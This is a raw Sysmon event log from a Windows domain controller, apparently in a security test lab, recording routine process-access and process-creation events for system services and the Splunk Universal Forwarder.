10341000x80000000000000001053420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.796{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.779{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD1-6151-3B00-00000000FD01}3564C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.764{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3B00-00000000FD01}3564C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.764{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD1-6151-3B00-00000000FD01}3564C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.765{5EBD8912-8CD1-6151-3B00-00000000FD01}3564C:\Windows\System32\vdsldr.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B344B812DD6C294360563E52B2EF1C13,SHA256=0A4CA31848D7513F97F72D0292F5BBEE1CA409AAFFCACDE5369E12003B34118D,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000001053409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.748{5EBD8912-8CD0-6151-2E00-00000000FD01}2384NT AUTHORITY\SYSTEMC:\Windows\system32\DFSRs.exeC:\Windows\debug\Dfsr00004.logMD5=7DE9B0D4E39EB8440F4BDEDA9D6F0B85,SHA256=2AF90471EB463C846536C044F75C1931A2D237BDCC4D41DA2144437FFB5D1E6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.706{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.648{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3A00-00000000FD01}3532C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.648{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3A00-00000000FD01}3532C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.648{5EBD8912-8CD1-6151-3900-00000000FD01}35123516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD1-6151-3A00-00000000FD01}3532C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.652{5EBD8912-8CD1-6151-3A00-00000000FD01}3532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD1-6151-3900-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001053395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.632{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3900-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.632{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3900-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.632{5EBD8912-8CD1-6151-3800-00000000FD01}35003504C:\Windows\system32\cmd.exe{5EBD8912-8CD1-6151-3900-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.642{5EBD8912-8CD1-6151-3900-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT 